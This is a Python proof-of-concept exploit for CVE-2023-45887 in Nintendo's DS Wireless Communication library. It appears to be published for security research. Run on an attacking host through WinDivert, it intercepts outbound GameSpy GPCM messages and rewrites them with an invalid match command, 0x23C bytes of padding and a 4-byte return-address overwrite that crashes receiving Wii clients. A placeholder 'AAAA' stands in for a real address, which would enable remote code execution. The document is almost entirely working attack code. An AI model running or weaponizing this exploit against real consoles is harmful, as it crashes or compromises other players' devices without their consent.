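# Exploit Title: DS Wireless Communication Remote Code Execution
# Date: 11 Oct 2023
# Exploit Author: MikeIsAStar
# Vendor Homepage: https://www.nintendo.com
# Version: Unknown
# Tested on: Wii
# CVE: CVE-2023-45887

"""Proof of concept for CVE-2023-45887 (DS Wireless Communication).

The script runs on the attacking host as a WinDivert packet filter. Every
outbound TCP segment that carries a GameSpy GPCM ``vMAT`` message is rewritten
in place: the original message body is replaced by a DWC match command byte
the target does not expect (``DWC_MATCH_COMMAND_INVALID``), ``PADDING_LENGTH``
bytes of filler and a 4-byte value (``LR_SAVE``) that is presumably meant to
overwrite a saved return address on the receiving client.

As shipped ``LR_SAVE`` is ``b'AAAA'`` — an invalid address, so this build
only demonstrates the memory corruption (the victim crashes); it does not
carry or execute a real payload.

You are fully responsible for all activity that occurs while using this
code. The author of this code can not be held liable to you or to anyone
else as a result of damages caused by the usage of this code. Only use it
against systems and traffic you are authorised to test.
"""

import re
import sys

# --- Variables (edit these) --------------------------------------------------

# Written immediately after the filler. Named after the saved link register
# (return address) it presumably clobbers on the PowerPC target — TODO confirm.
# 'AAAA' is deliberately not a valid address.
LR_SAVE = b'\x41\x41\x41\x41'
# Explicit checks instead of assert: assert is stripped under `python -O`,
# which would let a mis-sized value through silently.
if len(LR_SAVE) != 0x04:
    raise ValueError('LR_SAVE must be exactly 4 bytes')

# Filler pattern, repeated and cut to PADDING_LENGTH bytes.
PADDING = b'MikeStar'
if not PADDING:
    raise ValueError('PADDING must not be empty')

# --- Constants ---------------------------------------------------------------

DWC_MATCH_COMMAND_INVALID = b'\xFE'
PADDING_LENGTH = 0x23C
FINAL_KEY = b'\\final\\'
# Diverts *every* outbound TCP segment with data on this host, not only the
# game's traffic. NOTE(review): narrow this (destination host/port of the
# session under test) before use so unrelated connections are not touched.
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'

# GPCM "vMAT" message header, e.g. b'\\msg\\GPCM1vMAT'; the captured group is
# a one- or two-digit number (1-99). Compiled once, used for every segment.
_GPCM_MESSAGE_PATTERN = re.compile(rb'\\msg\\GPCM([1-9][0-9]?)vMAT')

# The filler block built once: PADDING repeated, truncated to exactly
# PADDING_LENGTH bytes.
_PADDING_BLOCK = (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]


def try_modify_payload(payload):
    """Rewrite a GPCM ``vMAT`` message into the CVE-2023-45887 trigger.

    Args:
        payload: raw TCP payload of one outbound segment (bytes).

    Returns:
        ``None`` when ``payload`` holds no GPCM ``vMAT`` header (the segment
        should be forwarded untouched). Otherwise the rewritten payload:
        the original bytes up to and including the matched header, then
        ``DWC_MATCH_COMMAND_INVALID``, exactly ``PADDING_LENGTH`` bytes of
        ``PADDING``, ``LR_SAVE`` and ``FINAL_KEY``. Everything that followed
        the header in the original message is dropped, so the result is
        generally a different length from the input.
    """
    match = _GPCM_MESSAGE_PATTERN.search(payload)
    if match is None:
        return None
    # Keep the header, drop the real message body, append the malformed
    # command plus filler and return-address overwrite (presumably a stack
    # buffer overflow on the receiving client — TODO confirm against target).
    return b''.join((
        payload[:match.end()],
        DWC_MATCH_COMMAND_INVALID,
        _PADDING_BLOCK,
        LR_SAVE,
        FINAL_KEY,
    ))


def main():
    """Divert outbound TCP traffic and rewrite GPCM messages on the fly.

    Each segment matched by ``WINDIVERT_FILTER`` is pulled off the stack,
    optionally rewritten by :func:`try_modify_payload`, and re-injected.
    Segments that are not rewritten are re-injected unchanged — a diverted
    packet that is never sent is dropped, which would stall every matching
    TCP connection on the host.

    Exits with a message when ``pydivert`` is missing or the process lacks
    the administrator rights WinDivert requires; Ctrl-C ends the loop quietly.
    """
    # Imported here rather than at module level so try_modify_payload can be
    # imported and tested on hosts without WinDivert (pydivert is Windows-only).
    try:
        import pydivert
    except ModuleNotFoundError:
        sys.exit("The 'pydivert' module is not installed !")

    try:
        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
            for packet in packet_buffer:
                payload = try_modify_payload(packet.payload)
                if payload is not None:
                    print('Modified a GPCM message !')
                    # NOTE(review): the new payload changes the segment length.
                    # pydivert is expected to recompute checksums on send, but
                    # nothing here adjusts TCP sequence/ack numbers of later
                    # segments in the flow — confirm this is acceptable.
                    packet.payload = payload
                packet_buffer.send(packet)
    except KeyboardInterrupt:
        pass
    except PermissionError:
        sys.exit('This program must be run with administrator privileges !')


if __name__ == '__main__':
    main()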